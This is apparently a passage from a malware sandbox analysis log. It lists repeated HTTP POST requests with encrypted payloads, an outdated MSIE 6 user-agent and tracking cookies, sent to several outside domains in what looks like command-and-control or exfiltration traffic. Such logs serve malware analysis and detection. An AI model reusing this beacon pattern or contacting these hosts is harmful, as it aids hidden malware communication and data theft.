                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 45 58 71 73 6d 30 6a 43 75 63 38 75 31 4d 35 30 69 34 46 4f 78 62 74 49 67 79 4c 51 73 67 6d 5a 2f 50 47 48 54 58 76 6e 62 30 54 37 2f 57 47 6a 53 52 42 78 55 6a 37 41 41 51 55 49 37 79 67 45 57 55 49 47 71 34 39 7a 4a 52 6c 2b 42 2f 67 6f 63 37 44 35 35 6f 47 4b 33 77 55 51 57 46 5a 7a 47 6f 33 6b 4a 73 6d 76 68 6b 4e 50 74 77 6f 49 44 36 66 69 49 58 49 4b 70 71 6d 2f 66 5a 30 42 53 35 62 68 79 70 2f 78 79 4b 54 76 32 76 71 2b 59 6d 45 49 77 4f 6e 6b 53 65 49 79 39 6c 79 31 44 4c 70 36 51 32 62 66 43 52 33 64 65 6d 65 45 73 53 41 36 55 57 34 70 70 35 4e 4e 4f 53 78 74 65 72 2b 51 6f 6d 49 79 4b 76 32 65 55 2f 73 56 70 32 50 73 72 55 50 36 65 70 72 54 56 54 65 6d 35 52 46 2b 4b 4e 52 37 4d 63 78 30 74 69 2b 79 55 38 43 75 71 31 64 6b 44 55 33 65 4c 52 77 42 2f 63 44 32 45 71 4e 32 33 48 5a 45 76 4e 44 2f 33 6e 6f 76 44 38 37 42 62 78 2f 46 70 4e 30 5a 68 55 2b 79 32 4c 47 4f 6e 52 61 6d 61 30 2b 78 55 6e 30 77 62 59 6f 6d 6e 70 4b 6b 75 41 6f 73 36 46 43 68 4d 50 34 32 73 30 30 48 57 30 54 44 50 49 7a 49 2f 72 46 4e 51 66 67 6f 49 50 74 4b 58 51 78 46 59 4e 6c 68 67 38 52 36 39 4e 70 62 37 59 71 76 70 4c 32 7a 77 4d 4f 69 76 4e 75 4f 77 41 4f 67 66 49 48 38 45 4a 45 4a 31 56 34 6f 6b 70 56 76 4d 4f 6b 4d 76 34 53 51 4a 76 53 45 35 38 48 38 4d 6d 2f 5a 6d 38 54 4b 2f 53 2b 58 52 63 47 63 56 53 65 36 6c 49 5a 50 64 69 54 6b 49 39 66 45 2b 6e 42 4c 78 4d 68 77 48 4f 2f 50 37 50 6b 69 46 31 4f 2f 70 53 2f 61 6a 44 50 52 52 54 74 52 57 51 76 4e 71 6a 67 55 37 4c 48 56 38 48 4a 2f 79 30 30 63 77 77 68 64 69 74 38 75 62 63 72 47 4d 6d 4a 6b 32 32 79 30 36 74 63 48 76 69 59 64 35 57 38 3d Data Ascii: EXqsm0jCuc8u1M50i4FOxbtIgyLQsgmZ/PGHTXvnb0T7/WGjSRBxUj7AAQUI7ygEWUIGq49zJRl+B/goc7D55oGK3wUQWFZzGo3kJsmvhkNPtwoID6fiIXIKpqm/fZ0BS5bhyp/xyKTv2vq+YmEIwOnkSeIy9ly1DLp6Q2bfCR3demeEsSA6UW4pp5NNOSxter+QomIyKv2eU/sVp2PsrUP6eprTVTem5RF+KNR7Mcx0ti+yU8Cuq1dkDU3eLRwB/cD2EqN23HZEvND/3novD87Bbx/FpN0ZhU+y2LGOnRama0+xUn0wbYomnpKkuAos6FChMP42s00HW0TDPIzI/rFNQfgoIPtKXQxFYNlhg8R69Npb7YqvpL2zwMOivNuOwAOgfIH8EJEJ1V4okpVvMOkMv4SQJvSE58H8Mm/Zm8TK/S+XRcGcVSe6lIZPdiTkI9fE+nBLxMhwHO/P7PkiF1O/pS/ajDPRRTtRWQvNqjgU7LHV8HJ/y00cwwhdit8ubcrGMmJk22y06tcHviYd5W8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 52 62 69 4e 55 70 36 79 76 38 38 4b 74 74 56 2b 36 66 6e 44 6d 34 48 5a 6e 5a 58 65 63 47 67 71 73 72 52 6f 53 36 71 44 79 34 4a 54 56 6b 4a 51 79 39 51 37 32 49 5a 57 69 32 48 77 30 61 37 50 6e 39 4a 61 6f 38 70 4e 49 68 4e 69 31 48 73 31 44 46 6a 55 46 49 36 79 6d 62 34 39 32 37 2b 2f 73 77 4e 62 76 47 4a 64 70 68 45 34 46 56 45 78 4d 37 44 37 75 57 56 52 71 6f 65 58 61 67 71 6f 59 36 62 6f 45 35 4f 39 31 4a 76 4f 67 2b 78 74 34 77 6c 46 59 70 4c 39 77 69 32 55 45 41 79 54 50 6a 39 53 32 6f 74 52 51 6d 79 58 35 41 69 35 52 67 4d 32 36 2b 36 79 6f 39 4f 67 34 6d 4e 70 79 31 39 59 68 51 55 43 45 64 4c 35 69 6d 70 4e 75 4d 78 58 6f 4b 37 38 5a 6e 4a 7a 34 6c 6c 6d 4f 6c 59 33 57 72 38 50 4e 61 6f 56 63 6b 72 43 7a 41 43 6a 63 4e 4d 42 75 76 53 77 72 79 4d 64 77 34 4d 6c 6e 73 64 31 63 36 68 74 35 5a 55 39 61 69 64 4b 52 7a 35 42 38 55 44 62 65 56 6b 48 4f 4d 45 79 58 4c 2b 72 79 6d 4f 6c 76 6c 6b 33 32 6d 39 78 5a 77 35 76 4e 4d 52 6f 44 73 78 42 4a 5a 7a 75 37 63 4f 48 4d 36 34 78 74 72 48 78 79 57 54 78 50 70 6f 63 6b 71 4c 54 42 77 77 62 64 36 65 76 55 4d 46 41 57 63 38 61 47 66 78 59 57 76 32 4f 36 43 68 35 33 32 4b 71 41 56 75 53 45 71 48 71 76 6e 76 6c 6d 59 56 70 74 2f 41 36 56 56 43 6e 79 5a 6f 6e 50 59 50 2b 47 6b 69 6c 62 79 44 66 54 37 35 48 65 2f 4f 6a 79 55 47 63 61 66 4c 50 67 32 34 6b 30 71 33 4f 74 76 49 49 4f 32 4f 52 41 53 67 65 46 65 4b 55 41 38 4b 42 63 53 6a 62 5a 73 35 6f 57 6b 58 4b 4b 5a 64 45 70 2b 4b 47 62 6d 42 58 71 63 54 73 66 38 68 4e 6b 57 76 76 46 67 62 4d 4e 46 31 63 6b 42 4a 78 71 6f 55 43 69 49 31 58 41 54 64 36 73 39 42 78 30 39 69 2b 6a 73 46 30 67 78 31 63 62 67 6a 77 57 36 46 31 2b 30 4d 45 6d 2f 7a 57 73 67 5a 2b 32 30 6a 64 49 73 42 53 57 6e 45 62 71 67 3d 3d Data Ascii: RbiNUp6yv88KttV+6fnDm4HZnZXecGgqsrRoS6qDy4JTVkJQy9Q72IZWi2Hw0a7Pn9Jao8pNIhNi1Hs1DFjUFI6ymb4927+/swNbvGJdphE4FVExM7D7uWVRqoeXagqoY6boE5O91JvOg+xt4wlFYpL9wi2UEAyTPj9S2otRQmyX5Ai5RgM26+6yo9Og4mNpy19YhQUCEdL5impNuMxXoK78ZnJz4llmOlY3Wr8PNaoVckrCzACjcNMBuvSwryMdw4Mlnsd1c6ht5ZU9aidKRz5B8UDbeVkHOMEyXL+rymOlvlk32m9xZw5vNMRoDsxBJZzu7cOHM64xtrHxyWTxPpockqLTBwwbd6evUMFAWc8aGfxYWv2O6Ch532KqAVuSEqHqvnvlmYVpt/A6VVCnyZonPYP+GkilbyDfT75He/OjyUGcafLPg24k0q3OtvIIO2ORASgeFeKUA8KBcSjbZs5oWkXKKZdEp+KGbmBXqcTsf8hNkWvvFgbMNF1ckBJxqoUCiI1XATd6s9Bx09i+jsF0gx1cbgjwW6F1+0MEm/zWsgZ+20jdIsBSWnEbqg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 59 65 53 48 59 69 73 6f 32 63 2b 35 42 36 52 6d 41 68 2b 71 50 4a 51 6a 67 79 37 78 62 51 59 67 6a 30 53 4b 31 39 4d 4e 45 4e 35 79 31 50 54 38 6a 41 42 33 63 33 35 54 59 4c 43 52 78 54 58 54 4f 7a 58 49 68 39 49 2b 72 41 49 48 7a 2b 78 53 50 58 2b 2f 38 63 78 42 64 51 30 39 42 41 2f 37 4c 63 36 33 33 62 64 2f 76 67 51 6b 44 56 57 7a 6c 53 30 47 45 42 4e 59 6e 52 4a 35 74 4c 79 4c 56 64 4c 34 50 56 55 49 6f 76 68 35 74 61 71 69 34 78 45 73 67 41 34 4f 72 35 74 61 6e 53 6f 77 5a 73 48 2f 53 67 4a 70 61 67 7a 59 5a 4c 33 66 50 66 56 74 6e 6b 4a 70 4c 67 67 74 7a 33 6d 6f 72 79 6e 66 4f 42 58 61 56 72 32 43 51 63 70 39 72 76 6a 52 6c 6e 61 79 49 38 76 71 63 4b 33 35 64 6f 71 37 6e 37 44 36 59 48 4a 58 68 50 49 76 34 62 42 48 50 55 59 36 78 68 59 72 61 57 54 33 48 4b 4b 4d 75 41 2b 74 56 4e 2f 2f 56 6e 43 36 37 74 7a 34 70 46 6c 53 6e 46 76 50 6c 73 6f 46 61 74 6c 58 32 55 6d 71 6d 39 53 70 52 41 77 4c 5a 2f 6c 4e 44 57 47 39 42 53 6a 42 7a 63 61 67 6a 78 75 4e 6c 6e 2b 6b 68 7a 32 51 31 56 52 41 7a 66 57 30 4c 48 6b 51 52 32 59 49 6b 46 44 6b 50 4a 6d 69 4e 52 6d 46 56 59 2f 67 79 59 42 49 72 59 37 44 5a 4e 55 65 55 54 35 55 47 44 4b 4d 76 5a 6c 50 33 55 74 7a 44 66 68 66 66 59 47 47 63 65 68 61 4a 4d 36 2f 32 5a 69 71 56 42 6c 2f 66 55 79 39 68 31 70 59 6d 6d 76 58 79 47 49 56 66 6a 53 71 57 31 53 76 2f 46 63 74 66 67 46 30 79 53 61 39 4f 51 65 62 4d 6c 38 4a 58 37 56 78 69 49 4c 75 77 4f 70 66 4f 52 36 38 71 7a 6d 6a 35 4d 55 59 68 68 72 39 63 32 32 68 61 65 61 50 35 38 35 48 50 52 64 52 4c 36 48 66 47 74 6b 67 4d 62 49 69 5a 4c 71 37 78 47 54 42 57 51 38 4c 54 74 34 59 77 41 3d 3d Data Ascii: YeSHYiso2c+5B6RmAh+qPJQjgy7xbQYgj0SK19MNEN5y1PT8jAB3c35TYLCRxTXTOzXIh9I+rAIHz+xSPX+/8cxBdQ09BA/7Lc633bd/vgQkDVWzlS0GEBNYnRJ5tLyLVdL4PVUIovh5taqi4xEsgA4Or5tanSowZsH/SgJpagzYZL3fPfVtnkJpLggtz3morynfOBXaVr2CQcp9rvjRlnayI8vqcK35doq7n7D6YHJXhPIv4bBHPUY6xhYraWT3HKKMuA+tVN//VnC67tz4pFlSnFvPlsoFatlX2Umqm9SpRAwLZ/lNDWG9BSjBzcagjxuNln+khz2Q1VRAzfW0LHkQR2YIkFDkPJmiNRmFVY/gyYBIrY7DZNUeUT5UGDKMvZlP3UtzDfhffYGGcehaJM6/2ZiqVBl/fUy9h1pYmmvXyGIVfjSqW1Sv/FctfgF0ySa9OQebMl8JX7VxiILuwOpfOR68qzmj5MUYhhr9c22haeaP585HPRdRL6HfGtkgMbIiZLq7xGTBWQ8LTt4YwA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 79 62 46 42 4a 34 6c 34 63 38 2b 76 75 57 77 77 32 4b 69 7a 6a 4b 4c 31 30 32 61 6e 45 4d 67 59 7a 5a 50 6c 4a 70 41 79 62 69 56 31 53 79 56 41 37 46 4d 44 77 6c 50 46 42 36 39 43 2b 61 66 77 4e 46 55 58 37 56 70 45 4d 4e 38 30 74 48 79 33 31 75 42 35 45 48 33 79 38 4c 56 48 37 66 2f 44 46 50 6c 66 4b 4a 65 49 36 54 70 55 34 69 56 31 49 64 45 62 48 33 57 33 46 5a 48 6a 61 4e 38 51 36 4d 6d 50 57 67 31 4d 43 57 55 45 4d 2b 33 50 4f 70 6e 32 31 2b 51 59 53 47 65 38 49 67 76 50 59 55 72 53 75 63 2f 77 65 76 43 47 6e 30 61 43 53 4e 61 76 45 5a 68 51 79 46 30 31 42 61 30 50 4f 39 66 2f 4c 63 36 6e 58 42 79 6f 36 5a 74 50 66 54 73 6e 6c 4d 48 4c 4d 4e 39 68 64 6a 32 37 6c 6e 43 59 57 41 44 6d 6a 68 72 2b 73 48 32 67 42 56 34 33 30 77 6b 54 4c 37 76 69 30 32 36 64 79 6c 7a 41 78 35 32 36 75 35 34 75 38 6b 43 44 73 47 6e 36 51 56 33 58 37 6c 32 67 49 4e 76 6c 64 70 42 46 46 6b 6f 49 4d 69 42 2f 4b 30 65 4c 4e 4f 72 45 6a 51 49 6b 33 33 37 68 61 6a 47 52 33 56 6d 4c 7a 48 63 4a 62 53 49 65 70 70 54 6a 47 6e 78 69 78 58 7a 68 78 41 36 75 63 43 6f 79 54 4c 6a 36 55 66 57 47 44 6b 79 6f 6e 6e 32 71 72 63 47 56 70 63 62 43 4a 46 74 53 4d 36 49 4f 62 6b 70 59 50 4c 6a 43 68 2b 31 46 36 4f 30 74 68 5a 53 65 53 4d 4c 65 39 74 2b 76 54 75 32 39 6c 62 69 35 47 50 5a 47 47 57 55 36 67 42 75 72 66 4a 2b 6c 48 35 73 35 42 64 6c 4b 56 4d 6d 47 51 6f 38 4d 2b 33 51 43 77 4e 67 4d 53 31 4b 6e 69 56 72 50 74 4a 37 71 6a 5a 4c 35 5a 31 63 58 72 44 76 66 77 57 6a 42 42 65 2b 68 33 4e 30 42 36 49 50 4c 62 77 32 48 4b 57 72 6a 7a 2f 76 4e 76 6a 57 6a 58 53 64 2f 7a 38 4f 37 49 79 72 64 78 57 59 70 62 50 6e 6e 55 74 59 72 73 45 56 48 76 77 6d 4b 52 37 6c 38 45 44 38 5a 61 48 70 33 59 33 45 3d Data Ascii: ybFBJ4l4c8+vuWww2KizjKL102anEMgYzZPlJpAybiV1SyVA7FMDwlPFB69C+afwNFUX7VpEMN80tHy31uB5EH3y8LVH7f/DFPlfKJeI6TpU4iV1IdEbH3W3FZHjaN8Q6MmPWg1MCWUEM+3POpn21+QYSGe8IgvPYUrSuc/wevCGn0aCSNavEZhQyF01Ba0PO9f/Lc6nXByo6ZtPfTsnlMHLMN9hdj27lnCYWADmjhr+sH2gBV430wkTL7vi026dylzAx526u54u8kCDsGn6QV3X7l2gINvldpBFFkoIMiB/K0eLNOrEjQIk337hajGR3VmLzHcJbSIeppTjGnxixXzhxA6ucCoyTLj6UfWGDkyonn2qrcGVpcbCJFtSM6IObkpYPLjCh+1F6O0thZSeSMLe9t+vTu29lbi5GPZGGWU6gBurfJ+lH5s5BdlKVMmGQo8M+3QCwNgMS1KniVrPtJ7qjZL5Z1cXrDvfwWjBBe+h3N0B6IPLbw2HKWrjz/vNvjWjXSd/z8O7IyrdxWYpbPnnUtYrsEVHvwmKR7l8ED8ZaHp3Y3E=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 50 38 4b 44 79 41 56 34 33 4d 2f 62 4d 32 4c 71 4c 41 6e 77 57 6e 34 79 46 57 2f 54 61 7a 77 4f 43 58 57 43 50 76 4d 58 6e 59 75 4e 61 51 34 75 5a 70 7a 69 38 73 61 37 45 72 71 45 4d 65 45 71 35 50 54 34 74 4d 37 39 72 41 43 2b 39 54 31 66 6f 74 54 76 52 71 4b 54 4c 2b 42 31 39 46 47 55 37 6a 59 51 38 41 79 4b 70 69 61 37 43 4e 4f 61 56 61 39 77 43 37 2f 77 55 52 6b 4f 54 50 35 58 74 78 79 39 31 4e 5a 34 75 41 78 50 55 6e 76 35 69 58 77 73 2f 67 78 6b 4f 70 61 4a 62 37 50 38 36 79 38 31 68 46 4e 43 75 70 35 30 59 32 56 66 61 79 51 58 5a 42 61 56 76 64 67 32 76 31 69 39 70 48 43 4a 6e 42 6b 78 2b 73 4e 68 36 5a 6e 45 4d 67 48 42 2f 62 41 67 76 4a 45 79 32 53 71 32 33 6a 4b 73 78 32 53 47 66 64 4d 53 65 61 54 30 66 57 46 71 46 46 34 5a 6a 48 6f 30 67 65 56 34 77 76 35 6a 56 77 73 69 5a 57 30 78 78 6c 59 6b 6c 78 68 51 57 6d 72 5a 73 46 38 77 31 2b 39 4c 52 68 75 34 6d 57 71 7a 65 39 39 2b 35 56 30 4e 79 51 42 59 30 68 62 35 59 76 39 2f 4c 55 72 43 2b 4f 5a 4f 42 37 50 2f 6c 56 51 6a 2b 2f 6b 35 77 63 79 4d 6b 58 64 53 6a 50 6f 6e 44 44 30 50 39 37 37 31 62 31 6e 6e 51 30 64 70 4f 4e 5a 77 6c 78 59 66 67 56 32 41 63 53 65 6e 65 63 38 2b 75 47 4f 50 42 6d 44 38 43 35 63 4c 74 48 52 36 68 75 58 70 48 38 4b 58 52 6f 39 49 48 46 45 4e 6e 65 64 58 69 30 57 35 46 6f 75 34 55 4f 4f 53 44 61 6b 68 4d 2b 4d 39 63 32 48 4c 55 2f 4b 42 4c 47 30 48 33 6a 5a 45 54 78 41 6d 31 4d 71 58 72 6e 4d 6e 47 78 45 6c 4e 51 48 6f 4a 58 72 44 45 43 64 75 6c 71 2f 68 44 2b 35 68 6e 50 71 2f 4b 72 33 30 4d 65 37 6d 43 6a 69 30 41 6d 74 39 77 57 47 7a 6a 61 6c 52 33 4d 74 72 37 45 4b 77 31 6e 35 53 66 71 47 45 58 47 4f 78 59 38 56 39 6b 4b 30 6a 2f 2b 32 2f 4a 61 31 75 34 44 41 65 4e 49 45 4a 6b 6e 4a 59 Data Ascii: P8KDyAV43M/bM2LqLAnwWn4yFW/TazwOCXWCPvMXnYuNaQ4uZpzi8sa7ErqEMeEq5PT4tM79rAC+9T1fotTvRqKTL+B19FGU7jYQ8AyKpia7CNOaVa9wC7/wURkOTP5Xtxy91NZ4uAxPUnv5iXws/gxkOpaJb7P86y81hFNCup50Y2VfayQXZBaVvdg2v1i9pHCJnBkx+sNh6ZnEMgHB/bAgvJEy2Sq23jKsx2SGfdMSeaT0fWFqFF4ZjHo0geV4wv5jVwsiZW0xxlYklxhQWmrZsF8w1+9LRhu4mWqze99+5V0NyQBY0hb5Yv9/LUrC+OZOB7P/lVQj+/k5wcyMkXdSjPonDD0P9771b1nnQ0dpONZwlxYfgV2AcSenec8+uGOPBmD8C5cLtHR6huXpH8KXRo9IHFENnedXi0W5Fou4UOOSDakhM+M9c2HLU/KBLG0H3jZETxAm1MqXrnMnGxElNQHoJXrDECdulq/hD+5hnPq/Kr30Me7mCji0Amt9wWGzjalR3Mtr7EKw1n5SfqGEXGOxY8V9kK0j/+2/Ja1u4DAeNIEJknJY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1690487546.7645209Data Raw: 57 67 7a 2f 56 54 2f 50 76 38 38 6d 30 46 4e 4c 48 70 50 6d 63 73 69 66 4d 6c 71 56 5a 49 42 6b 34 79 70 6d 6c 71 42 53 2f 70 33 43 64 63 30 68 34 78 72 6b 6f 77 63 49 72 68 58 4d 6c 4a 39 6e 31 2f 44 49 4c 6b 54 77 69 7a 44 55 56 59 58 30 75 53 70 65 47 56 76 64 33 50 4f 57 38 33 65 50 42 69 42 43 49 4e 69 6d 37 53 6b 42 58 67 70 39 6d 69 58 6b 75 43 52 45 6a 64 66 6c 35 70 66 51 59 4c 64 4c 51 70 70 58 35 79 43 6a 53 70 57 65 35 6b 78 6d 79 54 32 6b 52 52 47 78 44 32 53 6b 6d 43 46 45 4b 59 54 34 30 30 75 32 74 54 69 6d 49 65 78 37 69 78 64 41 41 6f 44 75 6f 30 52 53 70 73 78 32 50 5a 6e 6e 75 67 38 78 39 61 71 77 55 57 68 4d 47 35 70 77 61 39 52 31 70 63 65 6a 41 6a 69 52 74 56 72 77 64 41 32 6f 50 34 62 55 73 4b 4d 57 34 49 6c 32 55 6a 56 55 4f 35 70 55 47 44 45 42 4c 38 6f 32 70 32 62 4b 6f 41 37 6a 56 43 76 78 39 6f 6f 54 70 51 63 4b 37 69 7a 37 6e 75 34 4c 6b 48 31 77 66 68 71 58 2b 63 6c 6f 55 52 47 74 38 6a 62 30 43 2b 33 62 65 4a 6c 69 2b 4a 38 6a 57 50 74 54 68 52 6b 45 38 75 51 53 58 75 38 6f 6c 37 47 38 41 62 6e 65 4e 74 6a 57 53 34 38 6d 37 6a 62 6a 4b 31 4a 61 6a 6f 5a 57 4a 30 78 36 2f 48 6e 4e 71 61 4f 61 4e 34 41 4d 52 76 43 51 30 55 2f 7a 67 75 6a 6d 57 69 55 75 53 4b 76 37 78 5a 71 72 54 6f 38 39 4e 6f 33 4d 79 41 64 38 34 6c 63 38 6e 2f 37 45 36 78 35 67 55 2f 35 58 49 70 34 44 66 7a 52 4f 55 31 4c 74 47 2f 57 43 49 64 4f 44 6d 35 31 38 6f 2f 62 67 38 70 74 4d 7a 71 63 77 55 4a 30 41 4e 68 70 66 61 4b 51 56 30 45 51 54 79 4c 4b 6c 51 79 4b 75 68 2f 4c 74 35 6f 31 4a 6d 73 31 64 31 55 72 52 75 6f 73 4d 4f 6a 46 79 47 34 38 43 49 78 62 6d 37 42 56 7a 75 63 5a 72 6a 46 69 48 72 36 4d 53 68 44 37 45 46 77 74 76 46 77 3d 3d Data Ascii: Wgz/VT/Pv88m0FNLHpPmcsifMlqVZIBk4ypmlqBS/p3Cdc0h4xrkowcIrhXMlJ9n1/DILkTwizDUVYX0uSpeGVvd3POW83ePBiBCINim7SkBXgp9miXkuCREjdfl5pfQYLdLQppX5yCjSpWe5kxmyT2kRRGxD2SkmCFEKYT400u2tTimIex7ixdAAoDuo0RSpsx2PZnnug8x9aqwUWhMG5pwa9R1pcejAjiRtVrwdA2oP4bUsKMW4Il2UjVUO5pUGDEBL8o2p2bKoA7jVCvx9ooTpQcK7iz7nu4LkH1wfhqX+cloURGt8jb0C+3beJli+J8jWPtThRkE8uQSXu8ol7G8AbneNtjWS48m7jbjK1JajoZWJ0x6/HnNqaOaN4AMRvCQ0U/zgujmWiUuSKv7xZqrTo89No3MyAd84lc8n/7E6x5gU/5XIp4DfzROU1LtG/WCIdODm518o/bg8ptMzqcwUJ0ANhpfaKQV0EQTyLKlQyKuh/Lt5o1Jms1d1UrRuosMOjFyG48CIxbm7BVzucZrjFiHr6MShD7EFwtvFw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 79 62 46 42 4a 34 6c 34 63 38 2b 76 75 57 77 77 32 4b 69 7a 6a 4b 4c 31 30 32 61 6e 45 4d 67 59 7a 5a 50 6c 4a 70 41 79 62 69 56 31 53 79 56 41 37 46 4d 44 77 6c 50 46 42 36 39 43 2b 61 66 77 4e 46 55 58 37 56 70 45 4d 4e 38 30 74 48 79 33 31 75 42 35 45 48 33 79 38 4c 56 48 37 66 2f 44 46 50 6c 66 4b 4a 65 49 36 54 70 55 34 69 56 31 49 64 45 62 48 33 57 33 46 5a 48 6a 61 4e 38 51 36 4d 6d 50 57 67 31 4d 43 57 55 45 4d 2b 33 50 4f 70 6e 32 31 2b 51 59 53 47 65 38 49 67 76 50 59 55 72 53 75 63 2f 77 65 76 43 47 6e 30 61 43 53 4e 61 76 45 5a 68 51 79 46 30 31 42 61 30 50 4f 39 66 2f 4c 63 36 6e 58 42 79 6f 36 5a 74 50 66 54 73 6e 6c 4d 48 4c 4d 4e 39 68 64 6a 32 37 6c 6e 43 59 57 41 44 6d 6a 68 72 2b 73 48 32 67 42 56 34 33 30 77 6b 54 4c 37 76 69 30 32 36 64 79 6c 7a 41 78 35 32 36 75 35 34 75 38 6b 43 44 73 47 6e 36 51 56 33 58 37 6c 32 67 49 4e 76 6c 64 70 42 46 46 6b 6f 49 4d 69 42 2f 4b 30 65 4c 4e 4f 72 45 6a 51 49 6b 33 33 37 68 61 6a 47 52 33 56 6d 4c 7a 48 63 4a 62 53 49 65 70 70 54 6a 47 6e 78 69 78 58 7a 68 78 41 36 75 63 43 6f 79 54 4c 6a 36 55 66 57 47 44 6b 79 6f 6e 6e 32 71 72 63 47 56 70 63 62 43 4a 46 74 53 4d 36 49 4f 62 6b 70 59 50 4c 6a 43 68 2b 31 46 36 4f 30 74 68 5a 53 65 53 4d 4c 65 39 74 2b 76 54 75 32 39 6c 62 69 35 47 50 5a 47 47 57 55 36 67 42 75 72 66 4a 2b 6c 48 35 73 35 42 64 6c 4b 56 4d 6d 47 51 6f 38 4d 2b 33 51 43 77 4e 67 4d 53 31 4b 6e 69 56 72 50 74 4a 37 71 6a 5a 4c 35 5a 31 63 58 72 44 76 66 77 57 6a 42 42 65 2b 68 33 4e 30 42 36 49 50 4c 62 77 32 48 4b 57 72 6a 7a 2f 76 4e 76 6a 57 6a 58 53 64 2f 7a 38 4f 37 49 79 72 64 78 57 59 70 62 50 6e 6e 55 74 59 72 73 45 56 48 76 77 6d 4b 52 37 6c 38 45 44 38 5a 61 48 70 33 59 33 45 3d Data Ascii: ybFBJ4l4c8+vuWww2KizjKL102anEMgYzZPlJpAybiV1SyVA7FMDwlPFB69C+afwNFUX7VpEMN80tHy31uB5EH3y8LVH7f/DFPlfKJeI6TpU4iV1IdEbH3W3FZHjaN8Q6MmPWg1MCWUEM+3POpn21+QYSGe8IgvPYUrSuc/wevCGn0aCSNavEZhQyF01Ba0PO9f/Lc6nXByo6ZtPfTsnlMHLMN9hdj27lnCYWADmjhr+sH2gBV430wkTL7vi026dylzAx526u54u8kCDsGn6QV3X7l2gINvldpBFFkoIMiB/K0eLNOrEjQIk337hajGR3VmLzHcJbSIeppTjGnxixXzhxA6ucCoyTLj6UfWGDkyonn2qrcGVpcbCJFtSM6IObkpYPLjCh+1F6O0thZSeSMLe9t+vTu29lbi5GPZGGWU6gBurfJ+lH5s5BdlKVMmGQo8M+3QCwNgMS1KniVrPtJ7qjZL5Z1cXrDvfwWjBBe+h3N0B6IPLbw2HKWrjz/vNvjWjXSd/z8O7IyrdxWYpbPnnUtYrsEVHvwmKR7l8ED8ZaHp3Y3E=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheCookie: btst=8e12fd1539699ac6bdaab177f131d683|84.17.52.43|1690487547|1690487547|0|1|0; snkz=84.17.52.43Data Raw: 73 38 54 79 7a 4f 43 63 33 4d 39 42 4b 73 2b 73 4d 79 6f 45 41 78 4d 37 56 44 6c 49 62 54 56 48 46 4f 70 63 66 71 48 72 51 45 48 4e 30 32 44 51 4f 44 4a 50 49 70 49 7a 56 66 76 2b 44 34 34 71 76 6b 6c 37 64 6e 38 4a 72 2f 43 6d 43 6e 70 61 43 56 63 69 34 4e 77 72 48 49 64 4e 33 36 64 41 75 6b 79 6c 78 49 74 6e 5a 46 68 56 71 44 70 63 74 46 70 63 6e 78 6f 4a 44 79 39 4f 36 4c 75 68 51 59 52 6e 4f 77 70 65 4a 49 66 34 7a 79 7a 4a 6d 6a 48 52 2f 36 4f 52 4f 2f 48 5a 32 36 57 71 30 58 6a 34 63 32 57 6b 78 70 63 79 76 6f 30 72 71 6a 63 55 73 6e 4e 36 43 38 42 76 36 6e 65 58 6d 30 45 6b 5a 63 49 36 4d 75 67 65 43 54 57 76 55 4e 6c 6c 2f 75 61 6b 4f 4a 39 55 58 77 46 6d 54 4c 6e 2b 32 30 47 52 66 52 30 41 71 6e 4b 43 32 51 33 2f 37 67 79 71 39 6e 42 54 49 56 67 4c 76 71 46 59 54 4d 73 4b 65 38 78 30 53 7a 62 67 47 39 73 47 4e 58 64 41 79 37 36 62 50 5a 73 49 42 36 6a 6c 5a 7a 46 4b 7a 30 67 38 66 32 45 63 69 70 78 4d 38 74 4f 61 6e 58 57 78 79 4a 34 76 7a 48 66 76 68 68 67 42 53 32 50 6a 4a 32 55 50 46 77 32 41 77 50 72 55 6c 6d 6f 6a 34 32 73 36 32 44 5a 76 39 47 52 65 4d 55 30 67 6e 68 4f 76 36 77 46 66 53 6a 41 31 6b 34 69 77 48 2f 70 65 5a 55 41 46 71 76 4b 36 66 39 62 6a 6c 37 56 7a 31 5a 36 32 51 35 6b 6a 4b 4b 44 46 67 69 4e 79 51 4e 6e 4c 31 57 53 41 66 53 36 2b 6b 77 63 71 69 6b 33 6a 6c 54 6e 62 37 51 66 66 57 64 72 67 4f 77 73 46 32 78 47 65 42 7a 70 78 79 48 6e 56 76 42 42 6e 64 38 7a 68 46 4e 53 69 62 7a 50 51 59 35 57 36 69 71 33 70 4d 50 44 54 44 37 66 41 41 42 72 37 2b 37 57 46 38 67 54 51 57 31 74 73 45 79 69 43 78 45 4a 53 41 64 77 42 56 4e 71 77 74 33 2f 62 69 54 75 6c 53 51 3d 3d Data Ascii: 